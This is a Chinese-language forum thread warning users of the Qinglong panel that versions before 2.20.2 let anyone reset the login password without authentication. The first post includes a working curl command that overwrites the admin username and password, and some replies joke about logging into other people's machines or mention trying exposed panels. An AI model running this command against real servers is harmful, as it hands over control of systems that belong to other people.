mn001 发表于 2026-3-8 20:18:33

青龙漏洞,无密码登录任意面板,赶快更新最新版。

本帖最后由 mn001 于 2026-3-9 06:55 编辑

只要不是最新版2.20.2,用户密码被任意修改。
执行:curl -X PUT "http://IP:5700/open/user/init" -H "Content-Type: application/json" -d '{"username": "123", "password": "123"}'
返回:
{"code":200,"message":"更新成功"}

我的刚发现被改了, 还被挂了个脚本

=== 发表于 2026-3-8 22:34:34

我暂时是不敢用了。

HOH 发表于 2026-3-8 22:38:40

青龙漏洞,无密码登录任意面板,赶快更新最新版。
青龙漏洞,无密码登录任意面板,赶快登录别人的机器。

mn001 发表于 2026-3-9 06:55:07

HOH 发表于 2026-3-8 22:38
青龙漏洞,无密码登录任意面板,赶快更新最新版。
青龙漏洞,无密码登录任意面板,赶快登录别人的机 ...

理解能力超强

feixiang 发表于 2026-3-9 08:41:19

没暴露到外网,不用担心吧。

SpaceX 发表于 2026-3-9 08:44:43

随便找了几个都报错

williamc2 发表于 2026-3-9 10:36:18

不敢用:'(

rqp 发表于 2026-3-9 10:37:38

还能用吗

mn001 发表于 2026-3-9 10:56:56

SpaceX 发表于 2026-3-9 08:44
随便找了几个都报错

上周开始的。大半暴露在公网的应该都已经发现了异常,然后更新了。只有个别不上心的人没更新。比如我有一台平常不咋用的就昨天刚更新。
页: [1]
查看完整版本: 青龙漏洞,无密码登录任意面板,赶快更新最新版。